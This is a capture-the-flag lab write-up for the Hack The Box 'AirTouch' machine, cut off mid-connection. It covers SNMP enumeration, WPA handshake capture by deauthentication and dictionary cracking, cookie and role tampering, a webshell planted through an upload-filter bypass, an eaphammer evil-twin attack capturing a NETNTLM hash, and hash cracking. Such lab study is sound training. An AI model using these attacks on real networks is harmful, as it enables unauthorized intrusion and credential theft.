See this write-up in Brazilian Portuguese language here.
Introduction
Hello world!! Welcome to another step in my journey through the world of cybersecurity.
One of the first things a reckless youth does when installing Kali Linux for the first time is: Try to hack the neighbors' wifi password. Go back in time a bit, to around 2013. Kali had just been released, but YouTube already had countless wifi hacking tutorials using Backtrack5. I was one of those kids, and I lived in frustration because there were no neighbors with wifi where I lived.
Well, the world has changed since then, and we are here to perform wifi hacking on Hackthebox!
AirTouch is a machine designed to be difficult, but it was classified as Medium by the platform. We start by finding an open Udp port and, upon connecting to it, we obtain the default credentials for the user consultant. While searching this user's directory, we find a wifi network topology diagram showing that we were in an isolated network. However, consultant possessed the necessary wifi tools to perform handshake captures, which allowed us to connect to the non-corporate network, or the tablets network.
After finding session cookies in the .cap file captured in the previous attack, we gained access to the router's administrative panel. This allowed us to exploit a file upload vulnerability and gain direct access to system files. In one of these files, we obtained credentials to access the router remotely and gain root access to it. In its /root directory, we found the certificates required to perform an evil-twin attack, where we captured the NETNTLM hash and cracked it to obtain the corporate network password. We also found Ssh credentials for the router. After gaining access to the new network, we found more exposed credentials in the hostapd files. Using these new credentials, we became admin and finally root.
Reconnaissance
Nmap
To begin, I ran a full port scan with Nmap.
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 62 OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 bd:90:00:15:cf:4b:da:cb:c9:24:05:2b:01:ac:dc:3b (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCt5/czuvlRZ0Ueo5rURjmvlJDipbg3G8orjGjxa9ZuqUM5ZfZPBFKcRFji0HgJc6bQFTXDEXStqG5yxtieKu4LxNWyvuFtFawpQn+4v1qaA5j6E85Zh8qeE993mf+Q/Ea5YfIsZ/otloBj5UsOER8Y+t0/oybf2vVsBc4/925ekSL6Gk3p9BQRs2s4/n33+nEfq2C+bP4F8JkoUZgTPCV8MMat+mAc5t3hxQlUbAe2taiM8+Km8CEFaQkGdZDIPRaeYqLmrmRnNLtaOrYpzsea98Pt/54QICcusk0nsT39cXsbM5mW8bFpeEwXu+w/KRvtRkSg3QRWypilddyUBgEpAU4FEn8ifL2rbNIJ/C4NPNs2O1FzNi+E6twdRz1/p6ln0in3Y5PRXo4Y3Ln/PlqI8V1BrC8zfq7PIPuC4X7Agdq2ktnracnsL8oOhfLRWwrHaPOX2tZGA3dtRs1BiJbU3IiQQOf3IPnnQDc1lgNvlrYz7tFwrIvaSvCJWVZfIE0=
| 256 6e:e2:44:70:3c:6b:00:57:16:66:2f:37:58:be:f5:c0 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIFdougpfxwAEIWPEa46kK7yuwcialkBHhi6CR0aNOdjjNuPKkbc8GGATnt0vr5eEoc9lsYRRnBoyhoHZMd4oGw=
| 256 ad:d5:d5:f0:0b:af:b2:11:67:5b:07:5c:8e:85:76:76 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPp9qQHbtPkcaGbM4SnotIbktxIUaybHBXxDXKgyqYnK
10849/tcp closed unknown reset ttl 63
30677/tcp closed unknown reset ttl 63
43954/tcp closed unknown reset ttl 63
51778/tcp closed unknown reset ttl 63
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelThe Nmap scan returned only port 22 open. In the context of Hackthebox, this is usually a hint to run a Udp scan, as previously seen in the machine Underpass. I then ran a Udp scan and found port 161 open.
PORT STATE SERVICE REASON
161/udp open snmp udp-response ttl 62I connected to this port using the snmp-check tool and obtained some interesting information.
┌──(kali㉿kali)-[~/Boxes/Hackthebox/Medium/AirTouch]
└─$ snmp-check -c public -p 161 -v 1 $IP
snmp-check v1.9 - SNMP enumerator
Copyright (c) 2005-2015 by Matteo Cantoni (www.nothink.org)
[+] Try to connect to 10.129.36.242:161 using SNMPv1 and community 'public'
[*] System information:
Host IP address : 10.129.36.242
Hostname : Consultant
Description : "The default consultant password is: RxBlZhLmOkacNWScmZ6D (change it after use it)"
Contact : admin@AirTouch.htb
Location : "Consultant pc"
Uptime snmp : 00:19:24.60
Uptime system : 00:18:11.92
System date : -I discovered that the domain was airtouch.htb. I also obtained default credentials for the user consultant.
Initial Access
Shell as Consultant
Using the consultant credentials, I was able to connect via Ssh.
┌──(kali㉿kali)-[~/Boxes/Hackthebox/Medium/AirTouch]
└─$ ssh consultant@AirTouch.htb
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
consultant@airtouch.htb's password:
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-216-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro
This system has been minimized by removing packages and content that are
not required on a system that users do not log into.
To restore this content, you can run the 'unminimize' command.
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
consultant@AirTouch-Consultant:~$
In the consultant directory, there were two image files:
-rw-r--r-- 1 consultant consultant 131841 Mar 27 2024 diagram-net.png
-rw-r--r-- 1 consultant consultant 743523 Mar 27 2024 photo_2023-03-01_22-04-52.pngI downloaded the images to Kali using the scp command.
scp consultant@AirTouch.htb:/home/consultant/diagram-net.png ~/Downloads/
scp consultant@AirTouch.htb:/home/consultant/photo_2023-03-01_22-04-52.png ~/Downloads/
The images show the wifi network topology. There are three VLANs isolated from each other. The objective was quite clear. The prize would be in the corporate network.
Checking sudo permissions, I saw that the user consultant could become root.
consultant@AirTouch-Consultant:~$ sudo -l
Matching Defaults entries for consultant on AirTouch-Consultant:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User consultant may run the following commands on AirTouch-Consultant:
(ALL) NOPASSWD: ALL
consultant@AirTouch-Consultant:~$ sudo su
root@AirTouch-Consultant:/home/consultant# id
uid=0(root) gid=0(root) groups=0(root)
root@AirTouch-Consultant:/home/consultant# whoami
root
root@AirTouch-Consultant:/home/consultant# cd
root@AirTouch-Consultant:~# ls
eaphammerIn the /root/eaphammer directory, there were some configuration files and wifi hacking tools. Additionally, there was a dictionary for brute-force attacks and other pentest tools. consultant was likely conducting a pentest on the infrastructure.
Wifi Hacking
Scanning for available wifi networks, I discovered there were others beyond those listed in the topology diagrams.
root@AirTouch-Consultant:~/eaphammer# ip link set wlan0 up
root@AirTouch-Consultant:~/eaphammer# iw dev wlan0 scan | grep SSID
SSID: vodafoneFB6N
* Multiple BSSID
* SSID List
SSID: MOVISTAR_FG68
* Multiple BSSID
* SSID List
SSID: AirTouch-Internet
* Multiple BSSID
* SSID List
SSID: WIFI-JOHN
* Multiple BSSID
* SSID List
SSID: MiFibra-24-D4VY
* Multiple BSSID
* SSID List
SSID: AirTouch-Office
* Multiple BSSID
* SSID List
SSID: AirTouch-Office
* Multiple BSSID
* SSID ListSince the goal was to reach the corporate network, I tried using eaphammer to perform an evil-twin attack. However, it didn't work because I didn't have the correct network certificates. I then used aircrack-ng to capture the handshake and perform a dictionary attack to get the password for the tablets network, AirTouch-Internet.
I started by putting the network interface into monitor mode.
root@AirTouch-Consultant:~/eaphammer# airmon-ng start wlan0
Your kernel has module support but you don't have modprobe installed.
It is highly recommended to install modprobe (typically from kmod).
Your kernel has module support but you don't have modinfo installed.
It is highly recommended to install modinfo (typically from kmod).
Warning: driver detection without modinfo may yield inaccurate results.
PHY Interface Driver Chipset
phy0 wlan0 mac80211_hwsim Software simulator of 802.11 radio(s) for mac80211
(mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
(mac80211 station mode vif disabled for [phy0]wlan0)
phy1 wlan1 mac80211_hwsim Software simulator of 802.11 radio(s) for mac80211
phy2 wlan2 mac80211_hwsim Software simulator of 802.11 radio(s) for mac80211
phy3 wlan3 mac80211_hwsim Software simulator of 802.11 radio(s) for mac80211
phy4 wlan4 mac80211_hwsim Software simulator of 802.11 radio(s) for mac80211
phy5 wlan5 mac80211_hwsim Software simulator of 802.11 radio(s) for mac80211
phy6 wlan6 mac80211_hwsim Software simulator of 802.11 radio(s) for mac80211Then I used airodump-ng to find the BSSID for the AirTouch-Internet network.
root@AirTouch-Consultant:~/eaphammer# airodump-ng wlan0mon
CH 7 ][ Elapsed: 54 s ][ 2026-04-16 17:47
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
8A:80:85:A5:72:7A -28 39 0 0 6 54 CCMP PSK WIFI-JOHN
F0:9F:C2:A3:F1:A7 -28 39 2 0 6 54 CCMP PSK AirTouch-Internet
CE:8C:7D:38:48:57 -28 40 0 0 9 54 WPA2 CCMP PSK MiFibra-24-D4VY
22:A6:74:62:53:7E -28 78 0 0 3 54 CCMP PSK MOVISTAR_FG68
62:DB:1D:0D:3D:6E -28 555 0 0 1 54 TKIP PSK vodafoneFB6N
CH 3 ][ Elapsed: 1 min ][ 2026-04-16 17:48
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
8A:80:85:A5:72:7A -28 77 0 0 6 54 CCMP PSK WIFI-JOHN
F0:9F:C2:A3:F1:A7 -28 77 2 0 6 54 CCMP PSK AirTouch-Internet
CE:8C:7D:38:48:57 -28 76 0 0 9 54 WPA2 CCMP PSK MiFibra-24-D4VY
22:A6:74:62:53:7E -28 153 0 0 3 54 CCMP PSK MOVISTAR_FG68
62:DB:1D:0D:3D:6E -28 1079 0 0 1 54 TKIP PSK vodafoneFB6N
BSSID STATION PWR Rate Lost Frames Notes Probes
F0:9F:C2:A3:F1:A7 28:6C:07:FE:A3:22 -29 54 -36 0 2
(not associated) C8:8A:9A:6F:F9:D2 -29 0 - 1 0 3 AccessLink,AirTouch-Office
(not associated) 28:6C:07:12:EE:A1 -29 0 - 1 0 2 AirTouch-Office
(not associated) 28:6C:07:12:EE:F3 -29 0 - 1 0 8 AirTouch-Office
Quitting...After discovering the BSSID of the AirTouch-Internet network, I used airodump-ng to capture traffic and save it to the file captura.
root@AirTouch-Consultant:~/eaphammer# airodump-ng -c 6 --bssid F0:9F:C2:A3:F1:A7 -w captura wlan0monIn another terminal, I accessed the consultant account via Ssh and used the aireplay-ng tool to deauthenticate the user and capture the handshake upon reconnection.
root@AirTouch-Consultant:~/eaphammer# aireplay-ng -0 5 -a F0:9F:C2:A3:F1:A7 -c 28:6C:07:FE:A3:22 wlan0mon
17:57:02 Waiting for beacon frame (BSSID: F0:9F:C2:A3:F1:A7) on channel 6
17:57:02 Sending 64 directed DeAuth (code 7). STMAC: [28:6C:07:FE:A3:22] [ 0| 0 ACKs]
17:57:03 Sending 64 directed DeAuth (code 7). STMAC: [28:6C:07:FE:A3:22] [ 0| 0 ACKs]
17:57:03 Sending 64 directed DeAuth (code 7). STMAC: [28:6C:07:FE:A3:22] [ 0| 0 ACKs]
17:57:04 Sending 64 directed DeAuth (code 7). STMAC: [28:6C:07:FE:A3:22] [ 0| 0 ACKs]
17:57:04 Sending 64 directed DeAuth (code 7). STMAC: [28:6C:07:FE:A3:22] [ 0| 0 ACKs]Next, I successfully captured the handshake.
17:51:10 Created capture file "captura-02.cap".
CH 6 ][ Elapsed: 7 mins ][ 2026-04-16 17:58 ][ WPA handshake: F0:9F:C2:A3:F1:A7
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
F0:9F:C2:A3:F1:A7 -28 100 4382 178 0 6 54 CCMP PSK AirTouch-Internet
BSSID STATION PWR Rate Lost Frames Notes Probes
F0:9F:C2:A3:F1:A7 28:6C:07:FE:A3:22 -29 48 -48 0 825 EAPOL AirTouch-Internet
Quitting...Conveniently, the rockyou.txt dictionary was available in the wordlists/ directory.
root@AirTouch-Consultant:~/eaphammer# ls wordlists/
example_known_ssids_file.txt rockyou.txt rockyou.txt.tar.gzThus, I obtained the wifi password with the aircrack-ng tool.
root@AirTouch-Consultant:~/eaphammer# aircrack-ng -w wordlists/rockyou.txt captura-02.cap
Reading packets, please wait...
Opening captura-02.cap
Read 1498 packets.
# BSSID ESSID Encryption
1 F0:9F:C2:A3:F1:A7 AirTouch-Internet WPA (1 handshake)
Choosing first network as target.
Reading packets, please wait...
Opening captura-02.cap
Read 1498 packets.
1 potential targets
Aircrack-ng 1.6
[00:00:08] 21592/14344391 keys tested (2805.71 k/s)
Time left: 1 hour, 25 minutes, 6 seconds 0.15%
KEY FOUND! [ challenge ]
Master Key : D1 FF 70 2D CB 11 82 EE C9 E1 89 E1 69 35 55 A0
07 DC 1B 21 BE 35 8E 02 B8 75 74 49 7D CF 01 7E
Transient Key : EB A2 7F 17 B1 DE 01 3E 40 68 57 00 10 94 14 81
C9 61 BB E8 B1 08 18 CC F8 86 A8 99 82 4D 79 F0
F2 37 85 A2 3C F9 CE 5B 95 DC 98 78 95 58 AF 8D
01 03 B4 EA ED CD 0A 81 FB 45 10 5B 17 BE E3 1E
EAPOL HMAC : B0 B7 B6 6E 74 F2 6A 3B 6C 9B E2 CD 85 84 51 AC✅ Network Password AirTouch-Internet:
challenge.
To connect, I needed to disable monitor mode.
root@AirTouch-Consultant:~/eaphammer# airmon-ng stop wlan0mon
Your kernel has module support but you don't have modprobe installed.
It is highly recommended to install modprobe (typically from kmod).
Your kernel has module support but you don't have modinfo installed.
It is highly recommended to install modinfo (typically from kmod).
Warning: driver detection without modinfo may yield inaccurate results.
PHY Interface Driver Chipset
phy0 wlan0mon mac80211_hwsim Software simulator of 802.11 radio(s) for mac80211
(mac80211 station mode vif enabled on [phy0]wlan0)
(mac80211 monitor mode vif disabled for [phy0]wlan0mon)
phy1 wlan1 mac80211_hwsim Software simulator of 802.11 radio(s) for mac80211
phy2 wlan2 mac80211_hwsim Software simulator of 802.11 radio(s) for mac80211
phy3 wlan3 mac80211_hwsim Software simulator of 802.11 radio(s) for mac80211
phy4 wlan4 mac80211_hwsim Software simulator of 802.11 radio(s) for mac80211
phy5 wlan5 mac80211_hwsim Software simulator of 802.11 radio(s) for mac80211
phy6 wlan6 mac80211_hwsim Software simulator of 802.11 radio(s) for mac80211And then configure wpa_supplicant.
root@AirTouch-Consultant:~/eaphammer# wpa_passphrase "AirTouch-Internet" "challenge" > wpa.conf
root@AirTouch-Consultant:~/eaphammer# wpa_supplicant -B -i wlan0 -c wpa.conf
Successfully initialized wpa_supplicant
rfkill: Cannot open RFKILL control device
rfkill: Cannot get wiphy informationAnd then obtain an IP address via dhclient.
root@AirTouch-Consultant:~/eaphammer# dhclient wlan0
root@AirTouch-Consultant:~/eaphammer# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0@if29: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
link/ether ea:d5:33:69:fd:ea brd ff:ff:ff:ff:ff:ff link-netnsid 0
inet 172.20.1.2/24 brd 172.20.1.255 scope global eth0
valid_lft forever preferred_lft forever
4: wlan0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 42:00:00:00:00:00 brd ff:ff:ff:ff:ff:ff
inet 192.168.3.48/24 brd 192.168.3.255 scope global dynamic wlan0
valid_lft 86393sec preferred_lft 86393sec
inet6 fe80::4000:ff:fe00:0/64 scope link
valid_lft forever preferred_lft forever
8: wlan1: <BROADCAST,MULTICAST> mtu 1500 qdisc noop state DOWN group default qlen 1000
link/ether 02:00:00:00:01:00 brd ff:ff:ff:ff:ff:ff
9: wlan2: <BROADCAST,MULTICAST> mtu 1500 qdisc noop state DOWN group default qlen 1000
link/ether 02:00:00:00:02:00 brd ff:ff:ff:ff:ff:ff
10: wlan3: <BROADCAST,MULTICAST> mtu 1500 qdisc noop state DOWN group default qlen 1000
link/ether 02:00:00:00:03:00 brd ff:ff:ff:ff:ff:ff
11: wlan4: <BROADCAST,MULTICAST> mtu 1500 qdisc noop state DOWN group default qlen 1000
link/ether 02:00:00:00:04:00 brd ff:ff:ff:ff:ff:ff
12: wlan5: <BROADCAST,MULTICAST> mtu 1500 qdisc noop state DOWN group default qlen 1000
link/ether 02:00:00:00:05:00 brd ff:ff:ff:ff:ff:ff
13: wlan6: <BROADCAST,MULTICAST> mtu 1500 qdisc noop state DOWN group default qlen 1000
link/ether 02:00:00:00:06:00 brd ff:ff:ff:ff:ff:ffShell as user
I received the IP 192.168.3.48, indicating I was connected to the tablets network according to the diagram obtained earlier. Fortunately, there is Nmap on the consultant's laptop, so I ran a port scan on the entire network.
root@AirTouch-Consultant:~/eaphammer# nmap -Pn -F 192.168.3.0/24
Starting Nmap 7.80 ( https://nmap.org ) at 2026-04-16 18:24 UTC
Nmap scan report for 192.168.3.1
Host is up (0.000019s latency).
Not shown: 97 closed ports
PORT STATE SERVICE
22/tcp open ssh
53/tcp open domain
80/tcp open http
MAC Address: F0:9F:C2:A3:F1:A7 (Ubiquiti Networks)
Nmap scan report for 192.168.3.48
Host is up (0.0000050s latency).
Not shown: 99 closed ports
PORT STATE SERVICE
22/tcp open ssh
Nmap done: 256 IP addresses (2 hosts up) scanned in 26.20 secondsPort 80 HTTP of the gateway was open. I set up port forwarding to access it from my browser. Upon visiting the page, I found a login page.
However, I lacked credentials, and default Ubiquiti credentials such as ubnt : ubnt or ui : ui did not work. The only information I had was the .cap file from airodump-ng. To analyze the file, I used the password challenge for decryption.
✏️ Decrypting in Wireshark In
wiresharkclick: Edit --> Preferences --> Protocols --> IEEE802.11 --> Decryption Keys Inkey-typechoose wpa-pwd and inkeyenter challenge:AirTouch-Internet
While analyzing the Http requests, I found session cookies.
Next, I edited my cookies on the login page to access the dashboard.
But I couldn't perform any actions. Paying closer attention to the welcome message, I was the user user. I didn't have admin privileges. So, I edited the Role from user to admin.
This gave me access to the upload button. There was a restriction for php and html files. However, this could be easily bypassed with .php00% or .phtml extensions.
Thus, I successfully uploaded a simple webshell.
There were some files in the current directory, one of them being login.php. In this file, I found hardcoded credentials.
There was also a user user in /home/user.
Testing the admin password with the user user via Ssh, I managed to access the gateway.
root@AirTouch-Consultant:~/eaphammer# ssh user@192.168.3.1
The authenticity of host '192.168.3.1 (192.168.3.1)' can't be established.
ECDSA key fingerprint is SHA256:++nw1pytCTTnPb2ngccd1CzlYaYUoTF8GmQ3a3QHnaU.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.3.1' (ECDSA) to the list of known hosts.
user@192.168.3.1's password:
Permission denied, please try again.
user@192.168.3.1's password:
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-216-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro
This system has been minimized by removing packages and content that are
not required on a system that users do not log into.
To restore this content, you can run the 'unminimize' command.
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
user@AirTouch-AP-PSK:~$Privilege Escalation
Shell as remote
Just like consultant, this user could also become root using the sudo -i command.
user@AirTouch-AP-PSK:~$ sudo -l
Matching Defaults entries for user on AirTouch-AP-PSK:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User user may run the following commands on AirTouch-AP-PSK:
(ALL) NOPASSWD: ALLAfter becoming root, I listed the files in the /root directory. I took the opportunity to grab the user flag located there.
root@AirTouch-AP-PSK:~# ls -la
total 44
drwx------ 1 root root 4096 Apr 16 22:35 .
drwxr-xr-x 1 root root 4096 Apr 16 22:35 ..
lrwxrwxrwx 1 root root 9 Nov 24 2024 .bash_history -> /dev/null
-rw-r--r-- 1 root root 3106 Dec 5 2019 .bashrc
-rw-r--r-- 1 root root 161 Dec 5 2019 .profile
drwxr-xr-x 2 root root 4096 Mar 27 2024 certs-backup
-rwxr-xr-x 1 root root 0 Mar 27 2024 cronAPs.sh
drwxr-xr-x 1 root root 4096 Apr 16 22:35 psk
-rw-r--r-- 1 root root 364 Nov 24 2024 send_certs.sh
-rwxr-xr-x 1 root root 1963 Mar 27 2024 start.sh
-rw-r----- 1 root 1001 33 Apr 16 22:35 user.txt
-rw-r--r-- 1 root root 319 Mar 27 2024 wlan_config_aps
root@AirTouch-AP-PSK:~# cat user.txt
f724d9df5a284a6d751b3816ff0c9e34Among the files, there was also one called send_certs.sh. It contained more hardcoded credentials.
root@AirTouch-AP-PSK:~# cat send_certs.sh
#!/bin/bash
# DO NOT COPY
# Script to sync certs-backup folder to AirTouch-office.
# Define variables
REMOTE_USER="remote"
REMOTE_PASSWORD="xGgWEwqUpfoOVsLeROeG"
REMOTE_PATH="~/certs-backup/"
LOCAL_FOLDER="/root/certs-backup/"
# Use sshpass to send the folder via SCP
sshpass -p "$REMOTE_PASSWORD" scp -r "$LOCAL_FOLDER" "$REMOTE_USER@10.10.10.1:$REMOTE_PATH"Here was the winning ticket to reach the corporate network! However, I was still on a separate VLAN.
In the same file, there was the variable LOCAL_FOLDER="/root/certs-backup/", indicating that the certificates were copied from this directory and sent to the /home/certs-backup/ directory of the corporate network gateway.
I used the scp command to copy this directory to the consultant user's laptop. Then, I imported the correct certificates into the eaphammer tool.
./eaphammer --cert-wizard import --ca-cert certs-backup/ca.crt --server-cert certs-backup/server.crt --private-key certs-backup/server.keyRunning iw dev wlan0 scan again, I obtained more information about the AirTouch-Office network. For instance, the BSSID of the network and channel 44.
I then activated monitor mode and ran airodump-ng on channel 44 to capture the MAC addresses of the connected clients.
root@AirTouch-Consultant:~/eaphammer# airodump-ng --channel 44 wlan0mon
CH 44 ][ Elapsed: 18 s ][ 2026-04-17 21:54 ][ WPA handshake: AC:8B:A9:AA:3F:D2
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
AC:8B:A9:F3:A1:13 -28 100 202 0 0 44 54e WPA2 CCMP MGT AirTouch-Office
AC:8B:A9:AA:3F:D2 -28 100 202 50 0 44 54e WPA2 CCMP MGT AirTouch-Office
BSSID STATION PWR Rate Lost Frames Notes Probes
AC:8B:A9:AA:3F:D2 C8:8A:9A:6F:F9:D2 -29 0 -12e 0 1
AC:8B:A9:AA:3F:D2 28:6C:07:12:EE:A1 -29 6e-36e 0 37 PMKID AirTouch-Office
AC:8B:A9:AA:3F:D2 28:6C:07:12:EE:F3 -29 6e-54e 0 35 PMKID AirTouch-Office
Quitting...Then I ran eaphammer and, in another terminal, used aireplay-ng again to deauthenticate clients and capture the NETNTLM hash.
root@AirTouch-Consultant:~/eaphammer# ./eaphammer --bssid AC:8B:A9:AA:3F:D2 --essid AirTouch-Office --channel 44 --interface wlan0 --auth wpa-eap --creds --capture-wpa-handshakes yes
.__
____ _____ ______ | |__ _____ _____ _____ ___________
_/ __ \\__ \ \____ \| | \\__ \ / \ / \_/ __ \_ __ \
\ ___/ / __ \| |_> > Y \/ __ \| Y Y \ Y Y \ ___/| | \/
\___ >____ / __/|___| (____ /__|_| /__|_| /\___ >__|
\/ \/|__| \/ \/ \/ \/ \/
Now with more fast travel than a next-gen Bethesda game. >:D
Version: 1.14.0
Codename: Final Frontier
Author: @s0lst1c3
Contact: gabriel<<at>>transmitengage.com
[?] Am I root?
[*] Checking for rootness...
[*] I AM ROOOOOOOOOOOOT
[*] Root privs confirmed! 8D
[*] Saving current iptables configuration...
[*] Reticulating radio frequency splines...
Error: Could not create NMClient object: Could not connect: No such file or directory.
[*] Using nmcli to tell NetworkManager not to manage wlan0...
100%|███████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 1/1 [00:01<00:00, 1.00s/it]
[*] Success: wlan0 no longer controlled by NetworkManager.
[!] The hw_mode specified in hostapd.ini is invalid for the selected channel (g, 44)
[!] Falling back to hw_mode: a
[*] WPA handshakes will be saved to /root/eaphammer/loot/wpa_handshake_capture-2026-04-17-21-55-48-BqO4G0thMviUzENDTRFwkomzFYmPShnb.hccapx
[hostapd] AP starting...
Configuration file: /root/eaphammer/tmp/hostapd-2026-04-17-21-55-48-TBJ93ggGPKNwZcudnqxzxjNMHrLyeCYP.conf
rfkill: Cannot open RFKILL control device
wlan0: interface state UNINITIALIZED->COUNTRY_UPDATE
Using interface wlan0 with hwaddr ac:8b:a9:aa:3f:d2 and ssid "AirTouch-Office"
wlan0: interface state COUNTRY_UPDATE->ENABLED
wlan0: AP-ENABLED
Press enter to quit...
wlan0: STA 28:6c:07:12:ee:a1 IEEE 802.11: authenticated
wlan0: STA c8:8a:9a:6f:f9:d2 IEEE 802.11: authenticated
wlan0: STA c8:8a:9a:6f:f9:d2 IEEE 802.11: associated (aid 1)
wlan0: CTRL-EVENT-EAP-STARTED c8:8a:9a:6f:f9:d2
wlan0: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=1
wlan0: CTRL-EVENT-EAP-RETRANSMIT c8:8a:9a:6f:f9:d2
wlan0: CTRL-EVENT-EAP-RETRANSMIT c8:8a:9a:6f:f9:d2
wlan0: STA 28:6c:07:12:ee:f3 IEEE 802.11: authenticated
wlan0: STA 28:6c:07:12:ee:a1 IEEE 802.11: authenticated
wlan0: STA 28:6c:07:12:ee:f3 IEEE 802.11: authenticated
wlan0: STA 28:6c:07:12:ee:f3 IEEE 802.11: associated (aid 2)
wlan0: CTRL-EVENT-EAP-STARTED 28:6c:07:12:ee:f3
wlan0: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=1
wlan0: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=25
mschapv2: Fri Apr 17 21:56:19 2026
domain\username: AirTouch\r4ulcl
username: r4ulcl
challenge: 19:71:d4:0a:55:10:57:e9
response: 3a:a4:d1:1f:f1:26:fc:c4:0d:80:97:46:a0:07:ce:23:63:8f:6f:fd:42:40:3b:0e
jtr NETNTLM: r4ulcl:$NETNTLM$1971d40a551057e9$3aa4d11ff126fcc40d809746a007ce23638f6ffd42403b0e
hashcat NETNTLM: r4ulcl::::3aa4d11ff126fcc40d809746a007ce23638f6ffd42403b0e:1971d40a551057e9
wlan0: CTRL-EVENT-EAP-FAILURE 28:6c:07:12:ee:f3
wlan0: STA 28:6c:07:12:ee:f3 IEEE 802.1X: authentication failed - EAP type: 0 (unknown)
wlan0: STA 28:6c:07:12:ee:f3 IEEE 802.1X: Supplicant used different EAP type: 25 (PEAP)
wlan0: CTRL-EVENT-EAP-RETRANSMIT c8:8a:9a:6f:f9:d2
wlan0: STA 28:6c:07:12:ee:f3 IEEE 802.11: deauthenticated due to local deauth request
wlan0: STA 28:6c:07:12:ee:f3 IEEE 802.11: authenticated
[hostapd] Terminating event loop...
[hostapd] Event loop terminated.
[hostapd] Hostapd worker still running... waiting for it to join.
wlan0: interface state ENABLED->DISABLED
wlan0: AP-DISABLED
wlan0: CTRL-EVENT-TERMINATING
nl80211: deinit ifname=wlan0 disabled_11b_rates=0
[hostapd] Worker joined.
[hostapd] AP disabled.
Error: Could not create NMClient object: Could not connect: No such file or directory.
[*] Using nmcli to give NetworkManager control of wlan0...
100%|███████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 1/1 [00:01<00:00, 1.00s/it]
[*] Success: wlan0 is now managed by NetworkManager.Next, I cracked the hash with john.
┌──(kali㉿kali)-[~/Boxes/Hackthebox/Medium/AirTouch]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash
Warning: detected hash type "netntlm", but the string is also recognized as "netntlm-naive"
Use the "--format=netntlm-naive" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (netntlm, NTLMv1 C/R [MD4 DES (ESS MD5) 128/128 SSE2 4x3])
Warning: no OpenMP support for this hash type, consider --fork=2
Press 'q' or Ctrl-C to abort, almost any other key for status
laboratory (r4ulcl)
1g 0:00:00:00 DONE (2026-04-17 19:02) 1.250g/s 116025p/s 116025c/s 116025C/s politik..iceman11
Use the "--show --format=netntlm" options to display all of the cracked passwords reliably
Session completed.To connect, it was necessary to create a new configuration file.
network {
ssid="AirTouch-Office"
key_mgmt=WPA-EAP
eap=PEAP
identity="Airtouch\r4ulcl"
password="laboratory"
phase1="peapver=1"
phase2="auth=MSCHAPV2"
}And configure wpa_supplicant to connect to the new network.
root@AirTouch-Consultant:~/eaphammer# wpa_supplicant -B -c wpa1.conf -i wlan1
Successfully initialized wpa_supplicant
rfkill: Cannot open RFKILL control deviceAnd use dhclient to gain an IP on the network.
root@AirTouch-Consultant:~/eaphammer# dhclient -r && dhclient -v wlan1
Killed old client process
System has not been booted with systemd as init system (PID 1). Can't operate.
Failed to connect to bus: Host is down
System has not been booted with systemd as init system (PID 1). Can't operate.
Failed to connect to bus: Host is down
Internet Systems Consortium DHCP Client 4.4.1
Copyright 2004-2018 Internet Systems Consortium.
All rights reserved.
For info, please visit https://www.isc.org/software/dhcp/
Listening on LPF/wlan1/02:00:00:00:01:00
Sending on LPF/wlan1/02:00:00:00:01:00
Sending on Socket/fallback
DHCPDISCOVER on wlan1 to 255.255.255.255 port 67 interval 3 (xid=0xdb78581d)
DHCPDISCOVER on wlan1 to 255.255.255.255 port 67 interval 3 (xid=0xdb78581d)
